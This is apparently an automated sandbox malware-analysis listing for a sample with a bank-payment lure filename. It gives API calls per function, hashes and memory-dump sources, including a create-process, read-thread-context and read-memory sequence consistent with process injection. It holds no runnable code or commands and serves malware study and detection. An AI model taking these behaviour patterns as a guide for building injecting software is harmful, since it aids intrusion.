                                                                                                                                • Opcode Fuzzy Hash: 5adcb0f354c6965c33a8c652d2e7f903002fdb0d1fc521810eb4768cbb9137d4
                                                                                                                                • Instruction Fuzzy Hash: EAF14571608300DFCB14DF28D484A6ABBE5FF89314F54892EF8999B252D738E945CF82
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00724370
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00724415
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00724432
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconNotifyShell_$_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1505330794-0
                                                                                                                                • Opcode ID: 0fe72163af047f1a79aba3995dc4de9d0d2ac1e6dbd40c50d540a761f4abf5a0
                                                                                                                                • Instruction ID: 418d6177a9dc08fab8eb280e321410682912c3da8dd3d8e74c1237c3ae89e11f
                                                                                                                                • Opcode Fuzzy Hash: 0fe72163af047f1a79aba3995dc4de9d0d2ac1e6dbd40c50d540a761f4abf5a0
                                                                                                                                • Instruction Fuzzy Hash: 7131D2B0505751CFD720EF74E88469BBBF8FB48308F00492EF68AD6251E778A944CB56
                                                                                                                                APIs
                                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00745733
                                                                                                                                  • Part of subcall function 0074A16B: __NMSG_WRITE.LIBCMT ref: 0074A192
                                                                                                                                  • Part of subcall function 0074A16B: __NMSG_WRITE.LIBCMT ref: 0074A19C
                                                                                                                                • __NMSG_WRITE.LIBCMT ref: 0074573A
                                                                                                                                  • Part of subcall function 0074A1C8: GetModuleFileNameW.KERNEL32(00000000,007E33BA,00000104,?,00000001,00000000), ref: 0074A25A
                                                                                                                                  • Part of subcall function 0074A1C8: ___crtMessageBoxW.LIBCMT ref: 0074A308
                                                                                                                                  • Part of subcall function 0074309F: ___crtCorExitProcess.LIBCMT ref: 007430A5
                                                                                                                                  • Part of subcall function 0074309F: ExitProcess.KERNEL32 ref: 007430AE
                                                                                                                                  • Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28
                                                                                                                                • RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1372826849-0
                                                                                                                                • Opcode ID: d1ad99e5fb682687c0457a0717e121d4d71f7d8d360505ee35191a4d7c9ef502
                                                                                                                                • Instruction ID: 77e7f41c4d17dc7db7699e6f763af0e5a6fd393d12f752a3018db36554bc979a
                                                                                                                                • Opcode Fuzzy Hash: d1ad99e5fb682687c0457a0717e121d4d71f7d8d360505ee35191a4d7c9ef502
                                                                                                                                • Instruction Fuzzy Hash: EE01F171240B49EFE6123B38EC8AA2E7398DF82361F110535F5199B183DF7C9C008A65
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00789548,?,?,?,?,?,00000004), ref: 007898BB
                                                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00789548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007898D1
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00789548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007898D8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                • Opcode ID: 8bf241d5cca40605a6d809ad31956c140faf8a399d6e59e8b6bd2a752fdac086
                                                                                                                                • Instruction ID: d4e8c3a26ff167a47067f16311411bbe94b1896c636033d9956a92440441e987
                                                                                                                                • Opcode Fuzzy Hash: 8bf241d5cca40605a6d809ad31956c140faf8a399d6e59e8b6bd2a752fdac086
                                                                                                                                • Instruction Fuzzy Hash: 77E08632281218BBDB312B94EC09FDA7F19AB47760F148121FB54690E087B51511979C
                                                                                                                                APIs
                                                                                                                                • _free.LIBCMT ref: 00788D1B
                                                                                                                                  • Part of subcall function 00742D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00749A24), ref: 00742D69
                                                                                                                                  • Part of subcall function 00742D55: GetLastError.KERNEL32(00000000,?,00749A24), ref: 00742D7B
                                                                                                                                • _free.LIBCMT ref: 00788D2C
                                                                                                                                • _free.LIBCMT ref: 00788D3E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 776569668-0
                                                                                                                                • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                • Instruction ID: 45e6f448b51346fc5cf7e22f98bea526ea068230bb5f8e75ada5ed39abe16005
                                                                                                                                • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                • Instruction Fuzzy Hash: DAE012A1B4160186CB64B578A944A9313DC4F5C392F95091DB40DD7187DF6CF8938634
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CALL
                                                                                                                                • API String ID: 0-4196123274
                                                                                                                                • Opcode ID: b4c55a68bbbc5ec49a6a62badfa3c37aeb9f393a38a0b60c2baa7c0bb718b686
                                                                                                                                • Instruction ID: 1897c06298688fe2a3ae73adaee43a246412561dafb895704278561072b3edf7
                                                                                                                                • Opcode Fuzzy Hash: b4c55a68bbbc5ec49a6a62badfa3c37aeb9f393a38a0b60c2baa7c0bb718b686
                                                                                                                                • Instruction Fuzzy Hash: 10225A70508361DFCB24DF24D494A6AB7E1BF45300F18896DE98A8B262D779ED85CB82
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                                • Instruction ID: 53ba06e04f364fa404f5548704246d533454f57d6c0877590503e4b526a36b97
                                                                                                                                • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                                • Instruction Fuzzy Hash: 0631A4B1604616AFC708DF68D9D1D69B3A9FF48320715C629E519CB391EB38E920CB90
                                                                                                                                APIs
                                                                                                                                • IsThemeActive.UXTHEME ref: 00724834
                                                                                                                                  • Part of subcall function 0074336C: __lock.LIBCMT ref: 00743372
                                                                                                                                  • Part of subcall function 0074336C: DecodePointer.KERNEL32(00000001,?,00724849,00777C74), ref: 0074337E
                                                                                                                                  • Part of subcall function 0074336C: EncodePointer.KERNEL32(?,?,00724849,00777C74), ref: 00743389
                                                                                                                                  • Part of subcall function 007248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00724915
                                                                                                                                  • Part of subcall function 007248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0072492A
                                                                                                                                  • Part of subcall function 00723B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00723B68
                                                                                                                                  • Part of subcall function 00723B3A: IsDebuggerPresent.KERNEL32 ref: 00723B7A
                                                                                                                                  • Part of subcall function 00723B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007E52F8,007E52E0,?,?), ref: 00723BEB
                                                                                                                                  • Part of subcall function 00723B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00723C6F
                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00724874
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1438897964-0
                                                                                                                                • Opcode ID: 2b9e19fa0fed0fe132b4467bb5cea228551171227109499bb55d6fe1f3a320f3
                                                                                                                                • Instruction ID: be8548b3c9fa14e3d026dc3807c4fefe9586d74ec4acde3dfed034c1254ccf7f
                                                                                                                                • Opcode Fuzzy Hash: 2b9e19fa0fed0fe132b4467bb5cea228551171227109499bb55d6fe1f3a320f3
                                                                                                                                • Instruction Fuzzy Hash: E111CDB1809395DBC700EF68EC8980ABBE8FF99750F10851EF1448B2B1DB789604CB96
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0074571C: __FF_MSGBANNER.LIBCMT ref: 00745733
                                                                                                                                  • Part of subcall function 0074571C: __NMSG_WRITE.LIBCMT ref: 0074573A
                                                                                                                                  • Part of subcall function 0074571C: RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F
                                                                                                                                • std::exception::exception.LIBCMT ref: 00740DEC
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00740E01
                                                                                                                                  • Part of subcall function 0074859B: RaiseException.KERNEL32(?,?,?,007D9E78,00000000,?,?,?,?,00740E06,?,007D9E78,?,00000001), ref: 007485F0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3902256705-0
                                                                                                                                • Opcode ID: 95cbbaa997cab6a4fe1a82a630baa67e0df82807999739d33d54d3e12c521efe
                                                                                                                                • Instruction ID: f837f4a3511a1f558b8b28c6f1bd94617eddd93ed46d0d6f764999424a825c33
                                                                                                                                • Opcode Fuzzy Hash: 95cbbaa997cab6a4fe1a82a630baa67e0df82807999739d33d54d3e12c521efe
                                                                                                                                • Instruction Fuzzy Hash: 96F0CD31A0031DA6CB10BEA8EC05ADF77AC9F01311F100429FE1496252DF789A55C5D1
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28
                                                                                                                                • __lock_file.LIBCMT ref: 007453EB
                                                                                                                                  • Part of subcall function 00746C11: __lock.LIBCMT ref: 00746C34
                                                                                                                                • __fclose_nolock.LIBCMT ref: 007453F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                • Opcode ID: 70f2aad26e907a7ecb3f71cf630794507c0cad8b856ee165dda1104d77ee65b5
                                                                                                                                • Instruction ID: 79b9c7d13b11a848eb2f3342d7f7c7aa838f6daf03e2234c9a29778fc75a5638
                                                                                                                                • Opcode Fuzzy Hash: 70f2aad26e907a7ecb3f71cf630794507c0cad8b856ee165dda1104d77ee65b5
                                                                                                                                • Instruction Fuzzy Hash: 73F09071901A08EBDB50AF65980A7AD66A06F41378F248209A464AB1C2DBBC9945AF62
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01F81A5B
                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F81AF1
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F81B13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                                • Instruction ID: 15029d2915ebe4b80330ea13ee55d18c3d66a93ce96e37fdeb16bd93b66ec10a
                                                                                                                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                                • Instruction Fuzzy Hash: A812DE24E18658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CB5A
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: 9e9f58a0f1c75a3b22a3f018a4a6cabf9ab0fea204df1f8dd646d289da5fa8f6
                                                                                                                                • Instruction ID: 4df28604962f07c11fd208f66f00ecff66d7fd294663e3d056e0e0e156d620ee
                                                                                                                                • Opcode Fuzzy Hash: 9e9f58a0f1c75a3b22a3f018a4a6cabf9ab0fea204df1f8dd646d289da5fa8f6
                                                                                                                                • Instruction Fuzzy Hash: 0B411574604351DFDB24DF24C458B1ABBE0BF49314F0988ACE9998B362C339EC45CB92
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                • Opcode ID: 2d859a7afaec70763d9e9456f73c516ef055629ab48e4600cc4653dc35de9cbe
                                                                                                                                • Instruction ID: 6073cc52273b277f6e3f5c390b5e63ca96ef583040dc37ab4a97705b49309586
                                                                                                                                • Opcode Fuzzy Hash: 2d859a7afaec70763d9e9456f73c516ef055629ab48e4600cc4653dc35de9cbe
                                                                                                                                • Instruction Fuzzy Hash: 682148B2A04A19EBDB188F25F8417A97BB4FF14352F20C42EE886C5090EB78C6D4D755
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00724BEF
                                                                                                                                  • Part of subcall function 0074525B: __wfsopen.LIBCMT ref: 00745266
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E0F
                                                                                                                                  • Part of subcall function 00724B6A: FreeLibrary.KERNEL32(00000000), ref: 00724BA4
                                                                                                                                  • Part of subcall function 00724C70: _memmove.LIBCMT ref: 00724CBA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1396898556-0
                                                                                                                                • Opcode ID: 17ba975727d94ccba7890cd8758434ee37ad5f1bb5405b4d8663d0d280ed24e0
                                                                                                                                • Instruction ID: 01bd306e2899855c9fcc3b2297cdd9f8d8af023bb7fcf834da84541f8bca0005
                                                                                                                                • Opcode Fuzzy Hash: 17ba975727d94ccba7890cd8758434ee37ad5f1bb5405b4d8663d0d280ed24e0
                                                                                                                                • Instruction Fuzzy Hash: 7A11E731A00215EBDF20BF70DC1AFAD77A8AF84710F10842DF941A7181DBB999059B50
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: 35005851845d001ee65e4175331334a311457f619348229986816b87b060e60f
                                                                                                                                • Instruction ID: 87f1e74644def41dd94df4a45ed08c2adeacbda5eb0498ca091a69e62c61f273
                                                                                                                                • Opcode Fuzzy Hash: 35005851845d001ee65e4175331334a311457f619348229986816b87b060e60f
                                                                                                                                • Instruction Fuzzy Hash: 082155B4608351DFCB14DF64D444B1ABBE0BF88314F04896CF98A47722D739E819CBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48490cc749f089fccd437f18e97576b4738c0f8357ed3fcc7e238cb7430c94f3
                                                                                                                                • Instruction ID: 4caf96c0569b1523586905ac52a911a406f7418865e11fd536cdecf240e63927
                                                                                                                                • Opcode Fuzzy Hash: 48490cc749f089fccd437f18e97576b4738c0f8357ed3fcc7e238cb7430c94f3
                                                                                                                                • Instruction Fuzzy Hash: 9301FE365401505FEB33AA64BC41AFDF3D8EFC0761B18846EED4492854D7786C44CBD6
                                                                                                                                APIs
                                                                                                                                • __lock_file.LIBCMT ref: 007448A6
                                                                                                                                  • Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
